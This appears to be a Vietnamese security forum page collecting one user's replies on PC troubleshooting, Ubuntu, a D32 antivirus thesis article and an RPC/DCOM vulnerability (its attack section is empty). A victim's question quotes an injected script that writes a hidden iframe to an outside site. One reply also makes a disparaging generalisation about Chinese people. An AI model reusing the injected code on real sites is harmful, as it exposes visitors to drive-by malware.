banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: holiganvn  XML
Profile for holiganvn Messages posted by holiganvn [ number of posts not being displayed on this page: 2 ]
 

elldes wrote:
em làm cho một công ty về bán hàng qua mạng.Nên địa chỉ liên lạc của em thường dùng bằng địa chỉ yahoo.Để khách hàng tiện cho việc đặt hàng vào giao dịch.Dạo gần đây khi em đăng nhập vào nick thì khoảng 2p sau là lại bị out ra.em có kiểom tra mạng máy tính thì báo vấn kêt nối bình thường.Em hỏi qua mấy người bạn thì họ nói là em đã bị ăn cắp mất nickNên mới có chuyện như vậy.Có bác nào biêt cách nào để có thể kiểm tra được xem những ai đã vào nick mình không?Làm ơn chỉ giúp em với!Em xin cảm ơn.Bác nào biêt có thể liên lạc với em qua địa chỉ yahoo : dragonboy_dung@yahoo.com  


bạn thử sử dụng 1 chương trình khác để đăng nhập nick yahoo xem,ví dụ như pidgin hoặc đăng nhập nick qua trang web http://webmessenger.yahoo.com/ coi có bị nữa không



OllyDbg is a 32-bit assembler level analysing debugger for Microsoft® Windows®. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable

The only really new feature (commented out in the second beta) is debugging of child processes. Other modifications are evolutional: much more stable (and tricky) debugging engine, more known functions, more or less consistent support for UNIcode and UTF8 in dialogs and comments, many bugfixes.

For more info and Download check: http://www.ollydbg.de

vohinhtrennet wrote:
Máy chủ quán nét của mình bị lỗi : Hình như là bị khóa màn hình.
Máy của mình không biết dính con virus gì mà khởi động lên thì lúc vào desktop thì chỉ là 1 màn hình chờ, trên desktop hoàn toàn trống trơn. Không thấy Mycomputer,IE,Yahoo,MyDocuments,....các game khác nữa.
Ấn Ctrl +Alt+Del thì bị khóa,thanh Start không hiển thị.
Vì máy tính của mình có 1 số tài liệu quan trọng nên mình không thể Fomat ổ cứng đựoc.
Mong các thành viên trong diễn đàn và Mod giúp đỡ mình diệt con virus này mà không mất dữ liệu
Mình xin cảm ơn. smilie 


bạn thử sử dụng Digiw Digiwiz MiniPE,boot vào để copy dữ liệu hoặc diệt virus coi được không

http://tctshare.com/viewtopic.php?f=15&t=442

noWhere_Man wrote:

holiganvn wrote:

conmale wrote:
Chậc... thạc sĩ CNTT mà phải bắt buộc học ngôn ngữ, xã hội và văn hóa TQ à? Chắc học xong ở lại làm luôn không chừng smilie  


he he ,bản chất của người TQ luôn luôn là thế mà bác 


Chưa được hiểu ý của holiganvn lắm. 


có gì bạn qua _http://hoangsa.org/forum/truongsa.php rồi sẽ hiểu,xin lỗi đã spam topic

conmale wrote:
Chậc... thạc sĩ CNTT mà phải bắt buộc học ngôn ngữ, xã hội và văn hóa TQ à? Chắc học xong ở lại làm luôn không chừng smilie  


he he ,bản chất của người TQ luôn luôn là thế mà bác

dangmanh wrote:
Chào tất cả anh e trong diễn đàn HVA !
Lâu ngày mình muốn hỏi anh e chút xíu !
mình có 1 cái ổ sam sung DVD rw combo !dạo trước nó vẫn đọc DVD,vcd,cd và ghi đĩa CD rất ngon !nhưng mà ko biết tại sao mà ổ mình mấy hôm nay ko đọc đc đĩa DVD nữa!còn đọc CD thì vẫn ngon !ko hiểu tại sao lại như thế nữa! bác nào biết chỉ giùm cho e tý dc ko?Nhu cầu của mình cần sử dụng đọc DVD là tất lớn !còn mua cái khác thì dạo này cũng kẹt quái!sinh viên mà !mong anh e thám khảo !
 


có thể con mắt đọc yếu,bạn nên đem đi bảo hành coi
/hvaonline/posts/list/31982.html
thông báo với các bác,D32 đã chính thức có diễn đàn riêng:

http://forum.d32av.vn/index.php

phamlenhan555 wrote:
mấy anh giúp em với em xin cảm ơn nhiều 


bạn có thể sử dụng http://www.google.com.vn/#hl=vi&source=hp&q=portable+IDM+5.18&btnG=T%C3%ACm+v%E1%BB%9Bi+Google&meta=&aq=f&oq=portable+IDM+5.18&fp=1190927c2498a1c
tổng hợp 20 ngôn ngữ lập trình phổ biến nhất PYTHON đứng thứ 7 trong năm 2009:

http://www.tiobe.com/index.php/content/paperinfo/tpci/index.html
lỗi này thường xuyên xảy ra mà bạn,thử post lại xem smilie
SƠ LƯỢC QUA LUẬN ÁN CỦA BÁC QUANG smilie

Máy tính tự nhận dạng và diệt virus mới

Hệ chẩn đoán diệt virus máy tính theo hướng tiếp cận máy học (D32 Anti-virus* 2009) là một ý tưởng khá táo bạo khi tác giả xây dựng cho máy một hệ tri thức để chúng có thể tự học cách nhận dạng và xử lý các loại virus máy tính mới.

Sản phẩm đã được BGK cuộc thi NTĐV 2009 đánh giá cao và là một trong 10 sản phẩm có tiềm năng ứng dụng lớn lọt vào vòng chung kết cuộc thi này. Sản phầm được tác giả Trương Minh Nhật Quang thuộc trung tâm Đại học tại chức Cần Thơ xây dựng trong thời gian 6 tháng (2/2009-8/2009).


Từ trăn trở nhiều năm…

Để đạt được kết quả như hiện nay, tác giả Trương Minh Nhật Quang đã nhiều năm trăn trở với câu hỏi: liệu có cách nào để xây dựng một hệ nhận dạng thông minh virus máy tính cho đa số người dùng hay không?

Theo tác giả, virus máy tính là sản phẩm do con người tạo ra nên cuộc chiến chống virus chính là cuộc đấu trí giữa chuyên gia hệ thống và tin tặc. Trong các hoạt động tư duy của con người, học là hoạt động nhận thức cơ bản nhất. Vì vậy muốn giải quyết bài toán nhận dạng thông minh virus máy tính, cần căn cứ vào sự tiếp cận dựa trên tri thức của các hệ học, để từ đó xây dựng một hệ cơ sở tri thức về virus máy tính, tư vấn chữa bệnh cho máy dựa trên kinh nghiệm của chuyên gia anti-virus đã tích hợp trong hệ thống. Mục tiêu của hệ là “dạy” cho máy tính tự học cách điều trị virus mới của các chuyên gia, giúp máy có thể tự khám và chữa khỏi bệnh.

Tác giả cũng cho biết, các phiên bản D32 cũ dựa chủ yếu vào cách tiếp cận chuỗi mã nên khả năng nhận dạng virus mới còn rất hạn chế. Phiên bản D32 Anti-virus* 2009 mới được phát triển từ phần mềm D32 Anti-virus (2001-2007) và xây dựng theo hướng tiếp cận anti-virus mới, tiếp cận Máy học và Hệ chuyên gia nên có khả năng phát hiện được các loại virus mới với những tính năng nhận dạng thông minh.

...đến sản phẩm thông minh

D32 Anti-virus* có hai tính năng cơ bản: nhận dạng virus đã biết và dự báo virus mới. Theo tác giả, các anti-virus trong nước chưa có tính năng dự báo virus mới (CMS đang nghiên cứu dự báo virus mới bằng kỹ thuật phân tích gien nhưng chưa có công trình công bố chính thức). Còn một số anti-virus nước ngoài cũng có dự báo virus mới nhưng các phần mềm này khá cồng kềnh nên sẽ làm giảm tốc độ của hệ thống.

Các anti-virus hiện nay đều dựa vào các tiếp cận chuỗi mã, hành vi hay ý định. Điểm khác biệt cơ bản giữa D32 Anti-virus* với các sản phẩm cùng loại là phần mềm được xây dựng theo tiếp cận hoàn toàn mới do tác giả nghiên cứu bằng luận án tiến sĩ “Tiếp cận Máy học và Hệ chuyên gia để nhận dạng virus máy tính”. Cơ chế hoạt động của D32 Anti-virus* gồm 3 giai đoạn:

+ Giai đoạn 1: Thu nhận tri thức, trích chọn đặc trưng, phân lớp dữ liệu và tổ chức cơ sở tri thức. Giai đoạn này sẽ được thiết kế trên máy chuyên gia với đầu vào là một tập virus và đầu ra là cơ sở dữ liệu virus chứa tập nhận dạng) và cơ sở tri thức (chứa tập luật nhận dạng), chuyển đến đầu vào cho các giai đoạn sau.

+ Giai đoạn 2: Phân loại dữ liệu, nhận dạng sơ khởi, xử lý dữ liệu bằng các mô hình học.

+ Giai đoạn 3: Báo cáo kết quả, thu nhận tri thức mới và cập nhật tăng trưởng cơ sở tri thức.

Giai đoạn 2 và 3 được thiết kế trên máy khách, sử dụng cơ sở dữ liệu virus và cơ sở tri thức để nhận dạng virus đã biết và dự báo virus mới dựa trên luật. Giai đoạn 3 báo cáo kết quả xử lý: đối tượng có nhiễm virus hay không, có khả năng nhiễm virus lạ không… thông qua các hộp thoại giao tiếp để tiếp tục thu nhận quyết định người dùng, cập nhật các tri thức này vào hệ thống, gửi mẫu nghi ngờ về cho chuyên gia phân tích (dữ liệu được hồi quy về giai đoạn 1) để tăng trưởng cơ sở tri thức cho hệ.

Ngoài tính năng dự báo virus mới, D32 Anti-virus* còn có các tính năng cơ bản của một anti-virus thông thường như quét theo yêu cầu (on demand), quét theo lịch (on scheduled), tự động bảo vệ (auto protect), cập nhật trực tuyến (online update)…

Hướng tới người dùng phổ thông

Theo tác giả, khách hàng mà D32 Anti-virus* nhắm tới là những người dùng phổ thông. Phần mềm được thiết kế để chạy trên các máy tính có cấu hình tối thiểu và hoạt động trên họ Windows 32 bit (có thị phần áp đảo so với các hệ điều hành khác) nên khả năng ứng dụng và thị trường tiêu thụ của sản phẩm là rất lớn, không những trong nước mà còn thể mở rộng ra nước ngoài.

Hơn nữa, khi máy tính ngày càng trở nên phổ biến với người dùng thì anti-virus là phần mềm không thể thiếu để thiết bị của họ chống lại các cuộc tấn công của hacker đang nóng lên từng ngày. Do đó, nhu cầu về anti-virus là rất cao nên D32 Anti-virus* sẽ có một thị trường ứng dụng rất lớn không chỉ hiện tại mà còn cả trong tương lai.

Vẫn còn hạn chế

Tuy nhiên, sản phẩm vẫn còn có những hạn chế mà nếu khắc phục được sẽ cho kết quả rất cao. Đó là phân hệ Quét virus của D32 chỉ kiểm tra các file sử dụng. Ở các phiên bản tiếp theo, tác giả sẽ bổ sung chức năng quét virus trong các file nén.

Phân hệ Canh phòng của D32 (kích thước 315KB) cũng cần được viết lại cho nhỏ gọn hơn, giảm yêu cầu bộ nhớ, bổ sung các API hooking, chặn các thao tác truy nhập ở mức thấp hơn và kiểm tra tương thích với Windows 7.

Hạn chế lớn nhất của sản phẩm là tập mẫu virus còn khiêm tốn so với các anti-virus nước ngoài nên việc lựa chọn mô hình học gặp nhiều khó khăn, cơ sở tri thức có ít luật nhận dạng nên khó xây dựng các luật phổ quát.

Virus máy tính là loại dữ liệu đặc biệt nguy hiểm, không dễ kiếm được số lượng lớn trong một thời gian ngắn. Mặt khác, do cạnh tranh thương mại nên các anti-virus thường không chia xẻ tập mẫu virus cho các hãng “đối thủ”. Do đó việc gia tăng số lượng virus cần có thời gian (thu thập mẫu virus từ nhiều nguồn), kinh phí (mua tập mẫu) và nhân lực (đào tạo chuyên gia, chuyển giao công nghệ).

Theo VnMedia
 

shenlongbk wrote:

nvphung90 wrote:
Bạn có thể add nick mình: nvphung90. Nếu được mình sẽ hỗ trợ bạn  

09/12/2008 10:05:23 (+0700) | #3 | 161818
Lần sau có post thì xem lần cuối post bài là ngày nào rồi hẵng post nha bạn smilie  


có sao đâu bạn smilie

corpx wrote:
mình nghĩ keyloger sẽ chạy trong win 1 process nào đó
thế sa0 mình ko mở task manager và end process của nó đi nhỉ


nếu có chương trình procexp.exe thì hay
tìm process mà con keylog đag chạy suppend nó rùi vô tư mà chat !
ý kiến nhỏ mọn của e!
 


chào corpx,nếu mình sử dụng kèm với Rootkit thì không bao giờ có chuyện tìm thấy các process của nó đâu,xem thêm:

http://vi.wikipedia.org/wiki/Rootkit
chào bạn laocoi,mình thấy trong kết quả báo của nmap,mình thấy rằng ở cổng 135 đang chạy dịch vụ msRPC,xin nói 1 tí về RPC:

-Remote Procedure Call (RPC) là một giao thức được sử dụng bởi hệ điều hành Windows. RPC cung cấp một cơ chế liên quan quá trình giao tiếp cho phép một chương trình chạy trên một máy tính dễ dàng thực thi mã trên một hệ thống từ xa.Có một lỗ hổng trong một phần của RPC khi trao đổi tin nhắn qua TCP / IP. Giao diện DCOM xử lý yêu cầu kích hoạt đối tượng đó được gửi bằng máy khách đến máy chủ. Một kẻ tấn công sẽ khai thác lỗ hổng này để cho phép chạy mã độc trên hệ thống trên một hệ thống.

- Để khai thác lỗ hổng này, kẻ tấn công đòi hỏi phải có khả năng gửi một yêu cầu đặc biệt đến cổng 135, 139, hoặc 445 hay bất kỳ cấu hình cụ thể khác RPC cổng trên máy từ xa.

QUÉT ĐỂ TÌM THẤY HỆ THỐNG BỊ LỖI:




TẤN CÔNG:




-chặn tất cả các cổng TCP / IP bạn không sử dụng, vào đây để tìm hiểu thêm về bảo mật cho RPC:

http://msdn.microsoft.com/en-us/library/aa379441(VS.85).aspx

windcloud208 wrote:
Chào mọi người!
hiện mình đang nghiên cứu về SQL injection và cách phòng chống nhưng không có source web bị lỗi để demo
ai có source web PHP bị lỗi SQL injection share mình với
mình chỉ làm demo môn học chứ không có mục đích nào khác
thanhks for sharing! 


topic này khá giống topic của bạn smilie

/hvaonline/posts/list/31763.html

learn2hack wrote:
Mình vẫn dùng bản cũ, mặc dù nghe nói bản 9.10 có nhiều điểm cải tiến đáng kể. Nhưng mình chú trọng đến ổn định. Bản 9.04 này ko có vấn đề gì với mình nên cũng ko muốn update. Thử nghiệm nhiều rồi giờ đâm ra cũng lười đi nữa smilie 


http://www.thongtincongnghe.com/article/13124

Huke_haoaye wrote:
Máy em hôm qua ko biết lướt web kiểu rì mà sáng này em dậy bật máy thì thấy Avira nó bào là bị dính kon trojan htmt/infecte.webpage.gen.
Em đã quét virut 2 lần thế mà đến khi vào web thì Avira nó bào là vẫn còn (Ức chế quá). Các bác có thể chỉ cho em cách xóa xổ con trojan này được kô ạ?
Em cảm ơn!  


vào đây để đọc cách diệt nè bạn smilie :

http://www.spywareremove.com/removeHTMLInfectedWebPageGen.html

phiên bản mới nhất của hệ điều hành linux, distro ubuntu 9.10 (tên mã Karmic Koala) chính thức được phát hành,các bác có thể download về,dùng thử ,Phiên bản ổn định cũng đã được phát hành vào ngày 29 tháng 10 năm 2009.

-Hướng dẫn upgrade từ ubuntu 9.04:

nhấn Alt+F2,gõ update-manager -d vào command box ,Update Manager sẽ hỏi bạn có muốn Upgrade lên bản 9.10 không,nhấn vào Upgrade và làm theo các bước trên màn hình




-các bạn cũng có thể download tại địa chỉ:

http://megashare.vn/ubuntu/

-đăng kí nhận đĩa miễn phí ubuntu:

https://shipit.ubuntu.com/

1 số hình ảnh về Ubuntu 9.10 Karmic Koala:













@all: các bạn xem bài viết này để bảo mật tài khoản Gmail của mình tốt hơn

http://gmailblog.blogspot.com/2009/10/gmail-account-security-tips.html

gazzzzzit wrote:
Tình hình là mạng của em dùng wifi , hiện tại tất cả các máy đã vào được mạng bình thường nhưng chỉ còn 1 em là không thể kết nối được . Chỉ thấy biểu tượng mạng cùng 1 vòng tròn chạy đi chạy lại. Hình như là AP ko cấp được địa chỉ IP thì phải. AP đã được đặt pass.
Ai biết giúp với nhé.Thanks 


thử:
Code:
ipconfig /release
ipconfig /renew

xxxooozzz wrote:
File index của kình bị chèn frame vào
Code:
echo "<script>document.write('<iframe src=\"http://hulmeux.com/?click=762187\" width=100 height=100 style=\"position:absolute;top:-10000;left:-10000;\"></iframe>');</script>";

Xóa đi thì chỉ mấy phút sau lại bị chèn vào.
Không biết là có phải do sever bị virus ?
Có ai bị giống như mình không, xin cho biết hướng giải qưyết ? 


Thế nên đối với cái host bạn chỉ cần set read only cho tất cả các file index và default là xong smilie

jforum3000 wrote:
Từ lâu rồi không thấy D32 phát triển bản mới nữa, đây là lý do chăng? 


@jforum3000: D32 không phát triển nữa do bác Quang thiếu kinh phí,còn luận án này là luận án bảo vệ chức danh tiến sĩ cũng là sản phẩm thi trí tuệ VIỆT NAM 2009 của bác ấy,xem thêm:

http://www.taichinhdientu.vn/Home/Giai-thuong-Nhan-tai-Dat-Viet-2009-Tam-huyet-voi-cong-cuoc-dai-cat-tim-vang/200911/67829.dfis

AIO wrote:
Sau khi "thẩm thấu" 5 pages /hvaonline/posts/list/31901.html, em có ý kiến mong các bác xem xét smilie :

Hiện nay trong các mục các bài viết được để chung với nhau và chỉ được phân biệt thông qua các chú thích thể loại ở đầu mỗi tiêu đề [ .... ] và em thấy nếu được phân bố lại :

Thảo luận bảo mật (ví dụ)
|------ Bài viết ( những bài viết được đưa vào mục này cần được kiểm duyệt mới được public )
|------ Thảo luận ( cũng cần được kiểm duyệt )
|------ ....................................................
|------ Hỏi đáp

thì có lẽ dễ quản lý hơn smilie  

nếu làm như bạn chắc các bác quản lí diễn đàn sẽ tốn rất nhiều thời gian sắp xếp lại bài,bù lại bố cục của mỗi "phân mục" sẽ rõ ràng và dễ thảo luận hơn smilie
sửa giùm bác Tổng Tư Lệnh cái link:

http://cmcinfosec.com/download/cmcark.zip

gamma95 wrote:
@holiganvn: Đoạn đầu đã thấy khó hiểu mà tóm lại khen sách hay là sao? smilie 


đơn giản,vì có thêm kiến thức

nhanth87 wrote:
Bạn nào đã mua được cuốn nghệ thuật tận dụng lỗi phần mềm của anh Nguyễn Thành Nam thì chỉ mình với.
Mình đi nát mấy hiệu sách ở tp. mấy hôm nay rồi mà chưa thấy smilie  





cuốn này mình cũng mới mua ,giá chỉ có 25.000,cuốn này em đọc hơi khó hiểu đoạn đầu,đi sâu vào cấu trúc máy tính,nhưng tóm lại là rất hay,nếu có thời gian và kinh phí thì bạn nên thử tham gia 1 khóa học do bác lamer bên bluemoon đưa lên nè:

/hvaonline/posts/list/27021.html

toiyeudoi wrote:
trong forum HVA thì mục " thảo luận bảo mật " đặt trước mục " thảo luận thâm nhập " ko biết có ý nghĩa gì ko ?  

cái này chắc phải những người đã lập ra và điều hành diễn đàn,bạn thử PM bác conmale coi smilie
 
Go to Page:  First Page Page 2 4 5 6 Page 7 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|